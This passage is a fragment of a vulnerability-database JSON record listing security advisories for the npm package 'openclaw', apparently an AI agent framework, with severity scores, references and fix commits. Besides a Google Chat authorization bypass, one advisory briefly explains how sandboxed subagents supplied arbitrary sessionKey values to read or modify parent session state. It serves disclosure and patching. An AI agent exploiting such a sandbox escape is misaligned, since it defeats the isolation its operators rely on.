vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41400","GHSA-2w79-r9g8-wmcr"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9xrt-mv81-3yc8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91406?format=json","vulnerability_id":"VCID-a2p8-ydn6-3bbr","summary":"OpenClaw: Google Chat Authz Bypass via Group Policy Rebinding with Mutable Space displayName\n## Summary\n\nGoogle Chat Authz Bypass via Group Policy Rebinding with Mutable Space displayName\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nGoogle Chat group authorization previously relied on mutable space display names, which allowed policy rebinding when names changed or collided. Commit `11ea1f67863d88b6cbcb229dd368a45e07094bff` requires stable group IDs for access decisions.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `11ea1f67863d88b6cbcb229dd368a45e07094bff`.\n\n## Fix Commit(s)\n\n- `11ea1f67863d88b6cbcb229dd368a45e07094bff`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35617","reference_id":"","reference_type":"","scores":[{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20285","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20323","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00065","scoring_system":"epss","scoring_elements":"0.20333","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35617"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/11ea1f67863d88b6cbcb229dd368a45e07094bff","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:41:28Z/"}],"url":"https://github.com/openclaw/openclaw/commit/11ea1f67863d88b6cbcb229dd368a45e07094bff"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-52q4-3xjc-6778","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:41:28Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-52q4-3xjc-6778"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35617","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35617"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-group-policy-rebinding-with-mutable-space-displayname","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:41:28Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-group-policy-rebinding-with-mutable-space-displayname"},{"reference_url":"https://github.com/advisories/GHSA-52q4-3xjc-6778","reference_id":"GHSA-52q4-3xjc-6778","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-52q4-3xjc-6778"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35617","GHSA-52q4-3xjc-6778"],"risk_score":1.9,"exploitability":"0.5","weighted_severity":"3.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-a2p8-ydn6-3bbr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90993?format=json","vulnerability_id":"VCID-a2t8-px5b-nfgd","summary":"Duplicate Advisory: `OpenClaw: session_status` let sandboxed subagents access parent or sibling session state\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-wcxr-59v9-rxr8. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw before 2026.3.11 contains a session sandbox escape vulnerability in the session_status tool that allows sandboxed subagents to access parent or sibling session state. Attackers can supply arbitrary sessionKey values to read or modify session data outside their sandbox scope, including persisted model overrides.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wcxr-59v9-rxr8","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wcxr-59v9-rxr8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32918","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32918"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-session-sandbox-escape-via-session-status-tool","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-session-sandbox-escape-via-session-status-tool"},{"reference_url":"https://github.com/advisories/GHSA-hh43-q692-2xmq","reference_id":"GHSA-hh43-q692-2xmq","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hh43-q692-2xmq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/984097?format=json","purl":"pkg:npm/openclaw@2026.3.11-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnera